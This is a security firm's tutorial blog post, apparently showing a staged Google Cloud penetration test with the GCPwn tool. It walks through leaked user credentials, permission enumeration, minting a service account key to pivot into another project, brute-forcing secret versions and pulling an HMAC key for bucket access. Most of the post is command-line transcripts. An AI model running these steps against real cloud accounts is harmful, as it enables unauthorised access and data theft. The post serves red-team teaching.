Scott Weston, Author at NetSPI The Proactive Security Solution Tue, 20 Aug 2024 20:07:28 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.1 https://www.netspi.com/wp-content/uploads/2024/03/favicon.png Scott Weston, Author at NetSPI 32 32 An Introduction to GCPwn – Parts 2 and 3 https://www.netspi.com/blog/technical-blog/cloud-pentesting/introduction-to-gcpwn-parts-2-and-3/ Wed, 21 Aug 2024 14:00:00 +0000 https://www.netspi.com/?p=25186 Example exploit path using GCPwn covering enumeration, brute forcing secrets manager versions, and downloading data from cloud storage both through default enum_buckets and with HMAC keys.

The post An Introduction to GCPwn – Parts 2 and 3 appeared first on NetSPI.

]]>
Part 2

Having covered authentication and modules in Part 1 of this blog, I’ll begin to walk through some example exploits/scenarios in Parts 2 & 3. Note I presented a similar scenario at fwd:cloudsec 2024 albeit with less modules shown. 

NOTE NONE OF THE PLAINTEXT CREDENTIALS WORK IN THIS BLOG 🙂 

This attack path will cover the following steps: 

  • Step 0: The Breach Premise 
  • Step 1: Setting Up Email/Password Credentials 
  • Step 2: Launch GCPwn with ADC Credentials 
  • Quick Overview of Next Steps: Generate Service Account Key  
  • Step 3: Reconnaissance in “my-private-test-project-430102” 
  • Step 4: Pivoting to “staging-project-1-426001” via SA Key 
  • Quick Overview of Next Steps: Get HMAC key From SecretsManager to then Enumerate Bucket via SigV4 Format 
  • Step 5: Enumerate, Enumerate, Enumerate Again (Buckets & Secrets) 
  • Step 6: Download Bucket Content with HMAC Keys 

Step 0: The Breach

Assume you are performing a pentest on a company and get access to a user’s desktop. Looking around you eventually stumble across “my_gmail_creds.txt”. While props can be given for good file naming convention, these would have to be subsequently taken back due to the existence of the following content in the text file:

Step 1: Setting Up Email/Password Credentials

This discovery of an email/password means we will go the ADC route in gcpwn which requires running some prep gcloud commands. You could run gcloud from within gcpwn but we are showing it before the tool installation for simplicity sake 

First, we will run “gcloud auth login” and sign in with the user credentials. 

Command Line Instructions/Response

>  gcloud auth login 

Your browser has been opened to visit: 

https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=325[TRUNCATED] 

You are now logged in as [fwdcloudsec2233@gmail.com]. 

Your current project is [None].  You can change this setting by running: 

  $ gcloud config set project PROJECT_ID 

Great! The credentials worked. It looks like the user has access to one project with the project ID shown below.  

Having successfully authenticated with the user email, let’s set the project ID via gcloud. Technically you can set it while in the tool with `projects set` but it tends to go more smoothly with email/password workflows just setting it via gcloud. 

> gcloud config set project my-private-test-project-430102  

Updated property [core/project]. 

With “gcloud auth login” successful and the project ID set, we need to run one final command to get our ADC credentials setup: gcloud auth application-default login. After running this command and signing into the GCP console once again, we should be good to proceed with gcpwn. As we will see later, adding credentials like service accounts is much simpler in that you point GCPwn to static values. For ADC it’s a bit more involved hence why this route is shown.

> gcloud auth application-default login 

Your browser has been opened to visit: 

https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=7640[TRUNCATED] 

Credentials saved to file: [/home/kali/.config/gcloud/application_default_credentials.json] 

These credentials will be used by any library that requests Application Default Credentials (ADC). 

Step 2: Launch GCPwn with ADC Credentials  

Having setup our authenticated gcloud CLI configuration, let’s start GCPwn and generate a credential set for our ADC credentials. To install GCPwn, follow the installation instructions per the gcpwn wiki. Then launch GCPwn as shown below. Since this is the tool’s first launch it will prompt you to define a workspace, a purely logical container to group your results. 

> python3 main.py  

[*] No workspaces were detected. Please provide the name for your first workspace below. 

> New workspace name: cool_pentesting_workspace 

[*] Workspace 'cool_pentesting_workspace' created. 

    GCPwn - https://github.com/NetSPI/gcpwn 

    Written and researched by Scott Weston of NetSPI (https://www.netspi.com/). Heavy inspiration/code snippets from Rhino Security Labs - https://rhinosecuritylabs.com/ 

    Like Pacu for AWS, the goal of this tool is to be a more pentesty tool for red team individuals or those who are less concerned with configuration statistics. 

    A wiki was created that explains all the modules/optins listed below found here: https://github.com/NetSPI/gcpwn/wiki. 

 

    GCPwn command info: 

        creds      [list] 

        creds info [<credname>]                         Get all info about current user  

        creds tokeninfo [<credname]                     Send token to tokeninfo endponit to get more details 

[TRUNCATED] 

    Other command info: 

        gcloud/bq/gsutil <command>            Run GCP CLI tool. It is recommended if you want to add a set of ADC creds while in GCPwn to run the following commands to add them at the command line 

                                                gcloud auth login 

                                                gcloud auth application-default login 

Welcome to your workspace! Type 'help' or '?' to see available commands. 

 

[*] Listing existing credentials... 

 

Submit the name or index of an existing credential from above, or add NEW credentials via Application Default Credentails (adc - google.auth.default()), a file pointing to adc credentials, a standalone OAuth2 Token, or Service credentials. See wiki for details on each. To proceed with no credentials just hit ENTER and submit an empty string.  

[1] *adc      <credential_name> [tokeninfo]                    (ex. adc mydefaultcreds [tokeninfo])  

[2] *adc-file <credential_name> <filepath> [tokeninfo]         (ex. adc-file mydefaultcreds /tmp/name2.json) 

[3] *oauth2   <credential_name> <token_value> [tokeninfo]      (ex. oauth2 mydefaultcreds ya[TRUNCATED]i3jJK)   

[4] service   <credential_name> <filepath_to_service_creds>    (ex. service mydefaultcreds /tmp/name2.json) 

[TRUNCATED] 

Input: adc leaked_adc_dev_creds 

[*] Project ID of credentials is: my-private-test-project-430102 

[*] Credentials successfuly added 

[*] Loading in ADC credentials... 

[*] Attempting to refresh the credentials using the stored refresh token. Note this is normal for brand new OAuth2 credentials added/updated. 

[*] Credentials sucessfully refreshed... 

[*] Credentials sucessfully stored/updated... 

[*] Proceeding with up-to-date ADC credentials for leaked_adc_dev_creds... 

[*] Loaded credentials leaked_adc_dev_creds 

(my-private-test-project-430102:leaked_adc_dev_creds)> 

Quick Overview of Next Steps: Generate a Service Account Key

At this point, let’s take a quick pause and look at the diagram below. This will effectively cover what our next steps will be. After some enumeration as the fwdcloudsec user, we will see that there is nothing of note in my-private-test-project-430102. The note in step 0 details a service account presumably in project ID “staging-project-1-426001”. Using this information, we will attempt to generate a key for the service account. This will be successful as the fwdcloudsec user is set up with the “Service Account Keys Admin” role on the select service account (although you as the attacker would not be privy to this knowledge).

Step 3: Reconnaissance in “my-private-test-project-430102” 

Having added credentials to GCPwn and set the project ID, the next steps will usually be enumerate, enumerate, enumerate.  

We want to find out as the fwdcloudsec user  

  1. What resources we have access to in this project 
  2. What permissions does our user have in the project   

As shown below we will: 

  1. Run creds info before any enumeration which will return an empty set of permissions for the fwdcloudsec user.  
  2. Run creds tokeninfo to send our access token to tokeninfo and get back the scope/permissions. Note you can manually set a credential email from within GCPwn, and we are just calling tokeninfo here for the sake of demonstrating the feature. 
  3. Run creds info again which will show that the additional scope/email has been added to the credentials profile.  
  4. Run enum_all --iam which will run ALL the enumeration modules. The “–iam” flag also will run testIamPermissions on organizations, folders, projects, buckets, functions, etc., which will return more enumerated permissions overall. We will add a “–txt” flag to save the output to a text file for later review if needed. 
  5. Run creds info again which will reveal what permissions fwdcloudsec might have. Many permissions are returned as enum_resources (which is included in enum_all) enumerates projects/folders/organizations and passing in “–iam” will run testIamPermissions at the project level. For those familiar with AWS, this is synonymous with enumerating permissions at the AWS account level. GCPwn will highlight dangerous or noticeable permissions red which is highlighted in the screenshot below.  
(my-private-test-project-430102:leaked_adc_dev_creds)> creds info 

Summary for leaked_adc_dev_creds: 

Email: None 

Scopes: 

    - N/A 

Default Project: my-private-test-project-430102 

All Projects: 

    - my-private-test-project-430102 

Access Token: ya29.a0AXooCgtX4[REDACTED] 

(my-private-test-project-430102:leaked_adc_dev_creds)> creds tokeninfo 

[*] Checking credentials against https://oauth2.googleapis.com/tokeninfo endpoint... 

[*] Succeeded in querying tokeninfo. The response is shown below: 

{'azp': '764[TRUNCATED].apps.googleusercontent.com', 'aud': '764[TRUNCATED]apps.googleusercontent.com', 'sub': '1057[TRUNCATED]', 'scope': 'https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/sqlservice.login https://www.googleapis.com/auth/userinfo.email openid', 'exp': '1721533307', 'expires_in': '3506', 'email': 'fwdcloudsec2233@gmail.com', 'email_verified': 'true', 'access_type': 'offline'} 

(my-private-test-project-430102:leaked_adc_dev_creds)> creds info 

Summary for leaked_adc_dev_creds: 

Email: fwdcloudsec2233@gmail.com 

Scopes: 

    - https://www.googleapis.com/auth/cloud-platform (See, edit, configure, and delete your Google Cloud data and see the email address for your Google Account.) 

    - https://www.googleapis.com/auth/sqlservice.login 

    - https://www.googleapis.com/auth/userinfo.email 

    - openid 

Default Project: my-private-test-project-430102 

All Projects: 

    - my-private-test-project-430102 

Access Token: ya29.a0AXooCgtX4[REDACTED] 

(my-private-test-project-430102:leaked_adc_dev_creds)> modules run enum_all --iam --txt /tmp/enum_all_txt_output_my-private-test-project-430102.txt 

[*]--------------------------------------------------------------------------------------------------------[*] 

[***********] Beginning enumeration for my-private-test-project-430102 [***********] 

[*]--------------------------------------------------------------------------------------------------------[*] 

[*] Beginning Enumeration of RESOURCE MANAGER Resources... 

[*] Searching Organizations 

[*] Searching All Projects 

[*] Searching All Folders 

[*] Getting remainting projects/folders via recursive folder/project list calls starting with org node if possible 

[*] NOTE: This might take a while depending on the size of the domain 

[SUMMARY] GCPwn found or retrieved NO Organization(s) 

[SUMMARY] GCPwn found or retrieved NO Folder(s) 

[SUMMARY] GCPwn found 1 Project(s) 

   - projects/765211561384 (My Private Test Project) - ACTIVE                                                                                                                                

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking my-private-test-project-430102 for instances... 

[X] STATUS 403: Compute API does not appear to be enabled for project my-private-test-project-430102 

[SUMMARY] GCPwn found or retrieved NO Compute Instance(s) in my-private-test-project-430102 

[*] Checking Cloud Compute Project my-private-test-project-430102... 

[X] STATUS 403: Compute API does not appear to be enabled for project my-private-test-project-430102 

[SUMMARY] GCPwn found or retrieved NO Compute Project(s) with potential metadata shown below. 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking my-private-test-project-430102 for functions... 

[X] 403 The Cloud Functions API is not enabled for projects/my-private-test-project-430102/locations/- 

[SUMMARY] GCPwn found or retrieved NO Function(s) in my-private-test-project-430102 

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[*] Checking my-private-test-project-430102 for HMAC keys... 

[SUMMARY] GCPwn found or retrieved NO HMAC Key(s) with corresponding service accounts (SAs) in my-private-test-project-430102 

[*] Checking my-private-test-project-430102 for buckets/blobs via LIST buckets... 

[SUMMARY] GCPwn found or retrieved NO Buckets (with up to 10 blobs shown each) in my-private-test-project-430102 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking my-private-test-project-430102 for service accounts... 

[SUMMARY] GCPwn found or retrieved NO Service Account(s) in my-private-test-project-430102 

[*] Checking my-private-test-project-430102 for roles... 

[SUMMARY] GCPwn found or retrieved NO Custom Role(s) 

[*] Checking IAM Policy for Organizations... 

[*] Checking IAM Policy for Folders... 

[*] Checking IAM Policy for Projects... 

[*] Checking IAM Policy for Buckets... 

[*] Checking IAM Policy for CloudFunctions... 

[*] Checking IAM Policy for Compute Instances... 

[*] Checking IAM Policy for Service Accounts... 

[*] Checking IAM Policy for Secrets... 

[***********] Ending enumeration for my-private-test-project-430102 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*] 

(my-private-test-project-430102:leaked_adc_dev_creds)> creds info 

Summary for leaked_adc_dev_creds: 

Email: fwdcloudsec2233@gmail.com 

Scopes: 

    - https://www.googleapis.com/auth/cloud-platform (See, edit, configure, and delete your Google Cloud data and see the email address for your Google Account.) 

    - https://www.googleapis.com/auth/sqlservice.login 

    - https://www.googleapis.com/auth/userinfo.email 

    - openid 

Default Project: my-private-test-project-430102 

All Projects: 

    - my-private-test-project-430102 

Access Token: ya29.a0AXooCgss[REDACTED] 

[******] Permission Summary for leaked_adc_dev_creds [******] 

- Project Permissions 

  - my-private-test-project-430102 

    - cloudfunctions.functions.call 

[TRUNCATED] 

    - compute.subnetworks.use 

    - compute.subnetworks.useExternalIp 

    - deploymentmanager.deployments.create 

    - iam.roles.update 

    - iam.serviceAccountKeys.create 

    - iam.serviceAccounts.actAs 

    - orgpolicy.policies.list 

    - orgpolicy.policy.get 

    - resourcemanager.hierarchyNodes.createTagBinding 

    - resourcemanager.hierarchyNodes.deleteTagBinding 

    - resourcemanager.hierarchyNodes.listEffectiveTags 

    - resourcemanager.hierarchyNodes.listTagBindings 

    - resourcemanager.projects.createBillingAssignment 

    - resourcemanager.projects.delete 

    - resourcemanager.projects.deleteBillingAssignment 

    - resourcemanager.projects.get 

    - resourcemanager.projects.getIamPolicy 

    - resourcemanager.projects.move 

    - resourcemanager.projects.setIamPolicy 

    - resourcemanager.projects.undelete 

    - resourcemanager.projects.update 

    - resourcemanager.projects.updateLiens 

[TRUNCATED] 

    - resourcemanager.tagValues.update 

    - storage.hmacKeys.create 

    - storage.hmacKeys.delete 

    - storage.hmacKeys.get 

    - storage.hmacKeys.list 

    - storage.hmacKeys.update 

Color Output

Color Schema for enum_all & Permission List

Step 4: Pivoting to “staging-project-1-426001” via Service Account Key

Having enumerated permissions/resources in the current project, let’s circle back to the note from Step 0 to see if there are any pivoting opportunities. The note mentions another service account, dev-service-account@staging-project-1-426001.iam.gserviceaccount.com, which in of itself contains a project ID, “staging-project-1-426001”. Thus, the service account itself could be a potential pivot into a different project ID.

We can’t see what permissions the fwdcloudsec user has over the dev-service-account service account, but we can still try to generate a service account key as a blind attempt. This will require the use of our first exploit module: “exploit_service_account_key”.  

As a quick aside, note in the image below modules can be filtered and an info blurb exists for many of them: 

In term terms of exploit_service_account_key, we will perform the steps shown below. Namely, we will: 

  1. Run the exploit module exploit_service_account_keys with the “-h” flag to see all the options possible for code execution. 
  2. Successfully run exploit_service_account_keys while specifying the specific service account name per the format dictated by the module. Note this includes the project ID and service account email. 
  3. Leverage the new key per the success prompt to pivot to a new credential set tied to the service account key. This new credential will be saved allowing us to drop back into it later upon gcpwn resuming.  
  4. Set the project ID as it did NOT change when swapping to the new credentials. We use projects set <project_id>.  
(my-private-test-project-430102:leaked_adc_dev_creds)> modules run exploit_service_account_keys -h 

usage: main.py [-h] [--sa SA] [--sa-key SA_KEY] [--create | --disable | --enable] [--assume] [-v] 

Exploit Service Account Key 

options: 

  -h, --help       show this help message and exit 

  --sa SA          Service account to generate service credentials for in the format projects/[project_id]/serviceAccount/[email] 

  --sa-key SA_KEY  Service account to key to enable/disable 

  --create         Create SA key 

  --disable        Disable SA key 

  --enable         Enable SA key 

  --assume         Assume the new credentials once created 

  -v, --debug      Get verbose data during the module run 

(my-private-test-project-430102:leaked_adc_dev_creds)> modules run exploit_service_account_keys --sa projects/staging-project-1-426001/serviceAccounts/my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com 

[*]-------------------------------------------------------------------------------------------------------[*] 

> Do you want to create a new sa key or disable/enable an existing one? 

>> [1] CREATE 

>> [2] ENABLE 

>> [3] DISABLE 

> [4] Exit 

> Choose an option: 1 

> The key was successfully created. Do you want to try assuming the new credentials [y\n].y 

[*] Credentials successfully added 

Loading in Service Credentials... 

[*] Loaded credentials my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192 

[*]-------------------------------------------------------------------------------------------------------[*] 

(my-private-test-project-430102:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> projects 

[*] Current projects known for all credentials:  

  my-private-test-project-430102 

(my-private-test-project-430102:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> projects set staging-project-1-426001 

[X] staging-project-1-426001 is not in the list of project_ids. Adding... 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> projects 

[*] Current projects known for all credentials:  

  my-private-test-project-430102 

  staging-project-1-426001 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> creds info 

Summary for my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192: 

Email: my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: N/A 

Quick Overview of Next Steps: Get HMAC Key From SecretsManager to then Enumerate Bucket via SigV4 Format 

Again, let’s take a quick pause and look at the diagram below. This will effectively cover what our next steps will be. We will identify a blob that exists in old-development-bucket-9282734 per enumeration. This bucket blob will give us a secret name but not specify the secret version. We will brute force all version numbers for the secret to get back a value consisting of HMAC keys tied to the bucket-accessor service account. These HMAC keys will then be used to download a blob from the normally blocked bucket service-account-details-2323232 via SigV4 and the Google Storage XML API. Finally, the ability to access this bucket will give us a new service account key for deployer-service-account.

Step 5: Enumerate, Enumerate, and Enumerate Again (Buckets & Secrets) 

While we have credentials for a new service account, my-dev-service-account, we still do not know what permissions the principal has respective to its project. As before, we can run “enum_all” to run all the enumeration modules and see what comes back.  

Because we added another project ID to GCPwn in the previous part, the tool will prompt the user to either run the selected module on the current project ID or all project IDs. GCPwn keeps a global list of project IDs (viewable via the “projects” command) to check REGARDLESS of the current user permissions/presence in that project ID. If you ever want to specify a subset of project IDs to run the module on, you can pass in --project-ids <project_id1>,<project_id2> to most modules. Just note choosing all projects might result in modules being run on unintended projects if they are in the global list. 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> modules run enum_all 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*] 

[***********] Beginning enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*] 

[*] Beginning Enumeration of RESOURCE MANAGER Resources... 

[*] Searching Organizations 

[*] Searching All Projects 

[*] Searching All Folders 

[-] No organizations, projects, or folders were identified. You might be restricted with regard to projects. If you know of a project name add it manually via 'projects add <project_name> from the main menu 

[*] Getting remainting projects/folders via recursive folder/project list calls starting with org node if possible 

[*] NOTE: This might take a while depending on the size of the domain 

[SUMMARY] GCPwn found or retrieved NO Organization(s) 

[SUMMARY] GCPwn found or retrieved NO Folder(s) 

[SUMMARY] GCPwn found or retrieved NO Project(s) 

[*] Beginning Enumeration of CLOUD COMPUTE Resources... 

[*] Checking staging-project-1-426001 for instances... 

[X] STATUS 403: Compute API does not appear to be enabled for project staging-project-1-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Instance(s) in staging-project-1-426001 

[*] Checking Cloud Compute Project staging-project-1-426001... 

[X] STATUS 403: Compute API does not appear to be enabled for project staging-project-1-426001 

[SUMMARY] GCPwn found or retrieved NO Compute Project(s) with potential metadata shown below. 

[*] Beginning Enumeration of CLOUD FUNCTION Resources... 

[*] Checking staging-project-1-426001 for functions... 

[X] 403 The Cloud Functions API is not enabled for projects/staging-project-1-426001/locations/- 

[SUMMARY] GCPwn found or retrieved NO Function(s) in staging-project-1-426001 

[*] Beginning Enumeration of CLOUD STORAGE Resources... 

[X] 403: The user does not have storage.hmacKeys.list permissions on bucket 

[*] Checking staging-project-1-426001 for HMAC keys... 

[SUMMARY] GCPwn found or retrieved NO HMAC Key(s) with corresponding service accounts (SAs) in staging-project-1-426001 

[*] Checking staging-project-1-426001 for buckets/blobs via LIST buckets... 

[**] Reviewing old-development-bucket-9282734 

[***] GET Bucket Object 

[***] LIST Bucket Blobs 

[***] GET Bucket Blobs 

[**] Reviewing service-account-details-2323232exit blob counts for this bucket... 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket service-account-details-2323232 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[SUMMARY] GCPwn found 2 Buckets (with up to 10 blobs shown each) in staging-project-1-426001 

- old-development-bucket-9282734 

  - my_staging_service_key.json 

- service-account-details-2323232 

*See all blobs with 'data tables cloudstorage-bucketblobs --columns bucket_name,name [--csv filename]' 

[*] Beginning Enumeration of SECRETS MANAGER Resources... 

[*] Beginning Enumeration of IAM Resources... 

[*] Checking staging-project-1-426001 for service accounts... 

[SUMMARY] GCPwn found or retrieved NO Service Account(s) in staging-project-1-426001 

[*] Checking staging-project-1-426001 for roles... 

[SUMMARY] GCPwn found or retrieved NO Custom Role(s) 

[*] Checking IAM Policy for Organizations... 

[*] Checking IAM Policy for Folders... 

[*] Checking IAM Policy for Projects... 

[*] Checking IAM Policy for Buckets... 

[X] 403: The user does not have storage.buckets.getIamPolicy permissions 

[*] Checking IAM Policy for CloudFunctions... 

[*] Checking IAM Policy for Compute Instances... 

[*] Checking IAM Policy for Service Accounts... 

[*] Checking IAM Policy for Secrets... 

[***********] Ending enumeration for staging-project-1-426001 [***********] 

[*]-------------------------------------------------------------------------------------------------------[*] 

It looks like enum_all did find some interesting results when run on just staging-project-1-426001. Some items to note are: 

  • No secrets or secret versions were returned from this enumeration. This will be relevant later. 
  • Two buckets were identified. A blob was listed for one bucket, and it’s unclear if no blobs were listed for the other bucket, “service-account-details-2323232, due to permissions or the bucket just being empty. 

Note if we forgot the bucket name from stdout above we could get enumerated data (like the bucket/blob names) via the following format: data tables <table_name> --columns <column_name1>,<column_name2>,…  [--csv <filename>].

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> data tables cloudstorage-bucketblobs --columns bucket_name,name 

bucket_name,name 

old-development-bucket-9282734,my_staging_service_key.json 

Let’s check out the one blob we can enumerate, my_staging_service_key.json. We will run enum_buckets but add the “–download” flag to download all reachable blobs. Note creds info (which also could have been run after enum_all in the previous steps) shows the added permissions identified from the successful module run. Notice how we only have “storage.objects.list” for one of the two buckets explaining why we can’t see the blobs in bucket service-account-details-2323232 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> modules run enum_buckets --download 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*]

[*] Checking staging-project-1-426001 for buckets/blobs via LIST buckets... 

[**] Reviewing old-development-bucket-9282734 

[***] GET Bucket Object 

[***] LIST Bucket Blobs 

[***] GET Bucket Blobs 

[***] DOWNLOAD Bucket Blobs 

[**] Reviewing service-account-details-2323232exit blob counts for this bucket... 

[***] GET Bucket Object 

[X] 403 The user does not have storage.buckets.get permissions on bucket service-account-details-2323232 

[***] LIST Bucket Blobs 

[X] 403: The user does not have storage.objects.list permissions on 

[SUMMARY] GCPwn found 2 Buckets (with up to 10 blobs shown each) in staging-project-1-426001 

- old-development-bucket-9282734 

  - my_staging_service_key.json 

- service-account-details-2323232 

*See all blobs with 'data tables cloudstorage-bucketblobs --columns bucket_name,name [--csv filename]' 

[*]-------------------------------------------------------------------------------------------------------[*] 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> creds info 

Summary for my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192: 

Email: my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: N/A 

[******] Permission Summary for my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192 [******] 

- Project Permissions 

  - staging-project-1-426001 

    - storage.buckets.list 

- Storage Actions Allowed Permissions 

  - staging-project-1-426001 

    - storage.buckets.get 

      - old-development-bucket-9282734 (buckets) 

    - storage.objects.list 

      - old-development-bucket-9282734 (buckets) 

    - storage.objects.get 

      - old-development-bucket-9282734 (buckets) 

    - storage.buckets.getIamPolicy 

      - old-development-bucket-9282734 (buckets) 

Having downloaded our data, let’s check its contents. All downloaded data (unless otherwise specified) ends up in the GatheredData folder at the root of gcpwn as seen below. 

>  tree GatheredData  

GatheredData 

└── 1_cool_pentesting_workspace 

    └── Storage 

        └── REST 

            └── staging-project-1-426001 

                └── old-development-bucket-9282734 

                    └── my_staging_service_key.json 

Reading the JSON file, we will see we are not as lucky as we had hoped.

> cat my_staging_service_key.json  

Nice try! We got docked for putting service account keys in buckets :(. I put the service account key in a special bucket "service-account-details-2323232" which is ONLY accessible to a new service account I made: "bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com". Creds for this are protected in secrets manager under the "ServiceAccountHMACKeys-388372" secrets. Think the secret version got overwritten but our script seems to still be working so not messing with it. ONLY that bucket-accessor service account should be able to access our bucket 

Apparently, the devs watched my fwd:cloudsec video and removed the credentials from this blob. Reading their message we can discern: 

  • There is a service account key in bucket service-account-details-2323232. As mentioned earlier it does not appear like we have permissions to access service-account-details-2323232 blobs with our current user. 
  • Per the secret name, ServiceAccountHMACKeys-388372, it appears like Cloud Storage HMAC keys are being used to access the bucket service-account-details-2323232. If you want to learn about HMAC keys review documentation here. In short, HMAC keys allow a user to access GCP buckets using SigV4 and requests are tied to Google’s “XML API” version for Cloud Storage (this is not part of the GCP SDK, I do this in gcpwn via requests library). Interestingly, if you are familiar with AWS SigV4, you can use the same methodology and just point to the GCP storage endpoint and it should still work. In fact, the enum_buckets call that will be used later to enumerate bucket contents over SigV4 and XML sends AWS headers to the GCP endpoint but still works due to the feature focusing on interoperability between the cloud providers. 
  • The HMAC keys are in a secret in secrets manager, although its unclear what version of the secret contains our HMAC keys.  

I can say for a fact the compromised service account, my-dev-service-account, has permissions to access secret version values (secretmanager.versions.access) per how I set it up. Looking back at our enum_all output, we had no secret values listed, so what gives? Well, gcpwn by default operates by trying to first call “List” on a resource followed by “Get” requests; in the absence of flags gcpwn must rely on the response from that initial List call. Therefore, if you don’t have list permissions on the resource, which my-dev-service-account does not for secrets manager, gcpwn won’t appear to pick up anything. The solution is to manually pass in the resource names to skip the List step and target specific secrets.   

Luckily the note above gave us the name of the secret to target. The enum_secrets module allows us to specify a version integer range along with the keyword “latest” as opposed to having to pass in every secret version one by one. With this in mind, lets take the secret name from the note, and try to run enum_secrets with a random version range specified. Let’s also add the –download flag as well to download any secrets found.

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> modules run enum_secrets --secrets projects/staging-project-1-426001/secrets/ServiceAccountHMACKeys-388372 --version-range 1-20,latest --download 

> Do you want to scan all projects or current single project? If not specify a project-id(s) with '--project-ids project1,project2,project3' 

>> [1] All Projects 

>> [2] Current/Single 

> [3] Exit 

> Choose an option: 2 

[*] Proceeding with just the current project ID 

[*]-------------------------------------------------------------------------------------------------------[*] 

[**] [staging-project-1-426001] Reviewing projects/staging-project-1-426001/secrets/ServiceAccountHMACKeys-388372 

[***] GET Base Secret Entity 

[***] LIST Secret Versions 

[****] GET Secret Version 1 

[****] GETTING Secret Values For 1 

[****] SECRET VALUE RETRIEVED FOR 1 

[****] GET Secret Version 2 

[****] GETTING Secret Values For 2 

[****] SECRET VALUE RETRIEVED FOR 2 

[****] GET Secret Version 3 

[****] GETTING Secret Values For 3 

[****] SECRET VALUE RETRIEVED FOR 3 

[****] GET Secret Version 4 

[****] GETTING Secret Values For 4 

[****] SECRET VALUE RETRIEVED FOR 4 

[****] GET Secret Version 5 

[****] GETTING Secret Values For 5 

An unknown exception occurred when trying to call get_secret_version as follows: 

404 Secret Version [projects/239052134916/secrets/ServiceAccountHMACKeys-388372/versions/5] not found. 

[****] GET Secret Version 6 

[****] GETTING Secret Values For 6 

An unknown exception occurred when trying to call get_secret_version as follows: 

404 Secret Version [projects/239052134916/secrets/ServiceAccountHMACKeys-388372/versions/6] not found. 

[TRUNCATED] 

[****] GET Secret Version latest 

[****] GETTING Secret Values For latest 

[****] SECRET VALUE RETRIEVED FOR latest 

[SUMMARY] GCPwn found 1 Secret(s) in staging-project-1-426001 

- ServiceAccountHMACKeys-388372 

  - 1: ${secret_hmac_key} 

  - 2: {secret_hmac_key} 

  - 3:  bucket-accessor@staging-project-1-426001.iam.gserviceaccount.com 

    GOOG1ELRQCDB33CEMAVFSAR6XOUDNYEV6GJDKKTCHJ3WNX5FLLP3C2 

  - 4: Why are we putting service account keys in buckets and then HMAC keys in here? Let's brainstorm a better solution Monday 

  - latest: Why are we putting service account keys in buckets and then HMAC keys in here? Let's brainstorm a better solution Monday 

[*]-------------------------------------------------------------------------------------------------------[*] 

(staging-project-1-426001:my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192)> creds info 

Summary for my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192: 

Email: my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com 

Scopes: 

    - N/A 

Default Project: staging-project-1-426001 

All Projects: 

    - my-private-test-project-430102 

    - staging-project-1-426001 

Access Token: N/A 

[******] Permission Summary for my-dev-service-account@staging-project-1-426001.iam.gserviceaccount.com_1721531912.325192 [******] 

[TRUNCATED] 

- Secret Actions Allowed Permissions 

  - staging-project-1-426001 

    - secretmanager.versions.access 

      - ServiceAccountHMACKeys-388372 (Version: 1) (secret version) 

      - ServiceAccountHMACKeys-388372 (Version: 2) (secret version) 

      - ServiceAccountHMACKeys-388372 (Version: 3) (secret version) 

      - ServiceAccountHMACKeys-388372 (Version: 4) (secret version) 

      - ServiceAccountHMACKeys-388372 (Version: latest) (secret version) 

It looks like versions 1-4 and latest were successful in retrieving secret values (version 4 and latest are the same secret version technically). In the text output we can see that a secret was added in version 3 that looks like a HMAC key and was later changed in version 4 with the user erroneously thinking changing later versions overwrote the past versions. Some standard output in gcpwn will restrict the output to a certain length. To see the full secret value, we can query the relevant table with data tables or check the downloaded file as shown below. Checking the CSV in GatheredData, we will see the version 3 secret contained an access key ID and secret key for a storage HMAC.

